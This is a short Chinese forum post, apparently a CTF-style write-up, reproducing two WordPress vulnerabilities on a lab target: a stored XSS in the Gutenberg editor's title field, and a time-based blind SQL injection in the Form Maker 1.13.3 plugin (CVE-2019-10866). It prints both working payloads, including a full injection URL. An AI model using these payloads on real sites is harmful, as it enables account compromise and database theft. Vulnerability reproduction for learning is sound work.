Wordpress 漏洞复现

Track-mss   ·   发表于 2021-08-24 16:43:09   ·   CTF&WP专版

0x01 WordPress Gutenberg编辑器存储型XSS漏洞

进入到wp的后台页面

选择add new板块,可见在编辑器的Add Title中,后台未对用户输入进行妥善的过滤或者正确转码,导致看到文章的用户都受到恶意代码的影响。

payload:

  1. "><img src=1 onerror=alert("xss")>

复现过程:

点击右上角”Publish”发布后,进入博客主页,出现弹窗:

进一步的利用此处不详述。

0X02 Wordpress 插件 Form maker 1.13.3 SQL注入漏洞 CVE- 2019-10866

该漏洞与wordpress本体的版本无关。
首先需要进入后台页面。

访问以下POC,会得到延时注入的效果:

  1. http://[wordpress靶场地址]/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring(user(),1,1)))%3d114+then+(select+sleep(5)+from+wp_users+limit+1)+else+2+end)+asc%3b

响应如下,可见存在sql注入漏洞:

后续进行正常注入流程即可。

打赏我,让我更有动力~

0 Reply   |  Until 5个月前 | 390 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.